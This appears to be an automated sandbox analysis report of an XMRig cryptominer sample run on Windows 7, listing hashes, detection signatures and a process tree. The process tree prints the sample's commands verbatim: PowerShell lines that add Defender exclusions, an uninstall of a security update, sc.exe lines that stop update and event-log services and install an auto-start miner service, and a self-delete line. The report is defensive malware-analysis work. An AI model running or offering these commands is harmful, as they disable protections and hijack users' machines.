Analysis
-
max time kernel
81s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
22-05-2024 20:13
Static task
static1
Behavioral task
behavioral1
Sample
836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe
Resource
win7-20240508-en
General
-
Target
836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe
-
Size
5.3MB
-
MD5
836f9e6c51fbf3fd503f192805a26f30
-
SHA1
d9a4b96c46237183b6914ed6ca77b87b8512cbf4
-
SHA256
1ed1f72170a4ddd93171be47d30bf47db08437cf76af64f2692a4e63cbab8ab1
-
SHA512
c3c074d2afb9aab572075c05014813da336758107e73b1cd988b3d62447f81a2928d113f1a1c5b236e405d27a0b3b1821a2601cea0c190ed226a22bd382f6a71
-
SSDEEP
98304:34Gr/W2hRkTwVNt6MkTi+XAVd18EjU6+cVX6IwUu:3jr/TMwVNtaP4KEjl6S
Malware Config
Signatures
-
XMRig Miner payload 8 IoCs
Processes:
resource yara_rule behavioral1/memory/1900-35-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1900-39-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1900-38-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1900-37-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1900-36-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1900-33-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1900-32-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1900-40-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 2600 powershell.exe 376 powershell.exe -
Creates new service(s) 2 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2692 cmd.exe -
Executes dropped EXE 2 IoCs
Processes:
dddbhxbblxrl.exepid process 476 836 dddbhxbblxrl.exe -
Loads dropped DLL 1 IoCs
Processes:
pid process 476 -
Processes:
resource yara_rule behavioral1/memory/1900-29-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1900-35-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1900-39-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1900-30-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1900-38-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1900-37-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1900-36-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1900-28-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1900-33-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1900-32-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1900-27-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1900-31-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1900-40-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in System32 directory 4 IoCs
Processes:
dddbhxbblxrl.exepowershell.exe836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\MRT.exe dddbhxbblxrl.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
dddbhxbblxrl.exedescription pid process target process PID 836 set thread context of 2120 836 dddbhxbblxrl.exe conhost.exe PID 836 set thread context of 1900 836 dddbhxbblxrl.exe nslookup.exe -
Drops file in Windows directory 2 IoCs
Processes:
wusa.exewusa.exedescription ioc process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2900 sc.exe 2856 sc.exe 2852 sc.exe 296 sc.exe 2896 sc.exe 2904 sc.exe 2404 sc.exe 1988 sc.exe 1572 sc.exe 2104 sc.exe 1960 sc.exe 2680 sc.exe 2696 sc.exe 2588 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60be9b9c84acda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exepowershell.exedddbhxbblxrl.exepowershell.exenslookup.exepid process 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 2600 powershell.exe 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 2416 836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe 836 dddbhxbblxrl.exe 376 powershell.exe 836 dddbhxbblxrl.exe 836 dddbhxbblxrl.exe 836 dddbhxbblxrl.exe 836 dddbhxbblxrl.exe 836 dddbhxbblxrl.exe 836 dddbhxbblxrl.exe 836 dddbhxbblxrl.exe 836 dddbhxbblxrl.exe 836 dddbhxbblxrl.exe 836 dddbhxbblxrl.exe 836 dddbhxbblxrl.exe 836 dddbhxbblxrl.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe 1900 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exenslookup.exedescription pid process Token: SeDebugPrivilege 2600 powershell.exe Token: SeShutdownPrivilege 2560 powercfg.exe Token: SeShutdownPrivilege 2528 powercfg.exe Token: SeShutdownPrivilege 2568 powercfg.exe Token: SeShutdownPrivilege 2520 powercfg.exe Token: SeDebugPrivilege 376 powershell.exe Token: SeShutdownPrivilege 1580 powercfg.exe Token: SeShutdownPrivilege 1664 powercfg.exe Token: SeShutdownPrivilege 1504 powercfg.exe Token: SeShutdownPrivilege 1748 powercfg.exe Token: SeLockMemoryPrivilege 1900 nslookup.exe -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
cmd.execmd.execmd.exedddbhxbblxrl.exedescription pid process target process PID 2784 wrote to memory of 2804 2784 cmd.exe wusa.exe PID 2784 wrote to memory of 2804 2784 cmd.exe wusa.exe PID 2784 wrote to memory of 2804 2784 cmd.exe wusa.exe PID 2692 wrote to memory of 2396 2692 cmd.exe choice.exe PID 2692 wrote to memory of 2396 2692 cmd.exe choice.exe PID 2692 wrote to memory of 2396 2692 cmd.exe choice.exe PID 1732 wrote to memory of 1272 1732 cmd.exe wusa.exe PID 1732 wrote to memory of 1272 1732 cmd.exe wusa.exe PID 1732 wrote to memory of 1272 1732 cmd.exe wusa.exe PID 836 wrote to memory of 2120 836 dddbhxbblxrl.exe conhost.exe PID 836 wrote to memory of 2120 836 dddbhxbblxrl.exe conhost.exe PID 836 wrote to memory of 2120 836 dddbhxbblxrl.exe conhost.exe PID 836 wrote to memory of 2120 836 dddbhxbblxrl.exe conhost.exe PID 836 wrote to memory of 2120 836 dddbhxbblxrl.exe conhost.exe PID 836 wrote to memory of 2120 836 dddbhxbblxrl.exe conhost.exe PID 836 wrote to memory of 2120 836 dddbhxbblxrl.exe conhost.exe PID 836 wrote to memory of 2120 836 dddbhxbblxrl.exe conhost.exe PID 836 wrote to memory of 2120 836 dddbhxbblxrl.exe conhost.exe PID 836 wrote to memory of 1900 836 dddbhxbblxrl.exe nslookup.exe PID 836 wrote to memory of 1900 836 dddbhxbblxrl.exe nslookup.exe PID 836 wrote to memory of 1900 836 dddbhxbblxrl.exe nslookup.exe PID 836 wrote to memory of 1900 836 dddbhxbblxrl.exe nslookup.exe PID 836 wrote to memory of 1900 836 dddbhxbblxrl.exe nslookup.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe"C:\Users\Admin\AppData\Local\Temp\836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2416 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2804
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2904
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2900
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2896
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2696
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2680
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "NCUDPJVW"2⤵
- Launches sc.exe
PID:2588
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "NCUDPJVW" binpath= "C:\ProgramData\eowgjsemsmrx\dddbhxbblxrl.exe" start= "auto"2⤵
- Launches sc.exe
PID:1988
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:2852
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "NCUDPJVW"2⤵
- Launches sc.exe
PID:2856
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\836f9e6c51fbf3fd503f192805a26f30_NeikiAnalytics.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2396
-
-
-
C:\ProgramData\eowgjsemsmrx\dddbhxbblxrl.exeC:\ProgramData\eowgjsemsmrx\dddbhxbblxrl.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:376
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:1272
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:296
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2404
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1960
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1572
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2104
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1504
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1748
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2120
-
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.3MB
MD5836f9e6c51fbf3fd503f192805a26f30
SHA1d9a4b96c46237183b6914ed6ca77b87b8512cbf4
SHA2561ed1f72170a4ddd93171be47d30bf47db08437cf76af64f2692a4e63cbab8ab1
SHA512c3c074d2afb9aab572075c05014813da336758107e73b1cd988b3d62447f81a2928d113f1a1c5b236e405d27a0b3b1821a2601cea0c190ed226a22bd382f6a71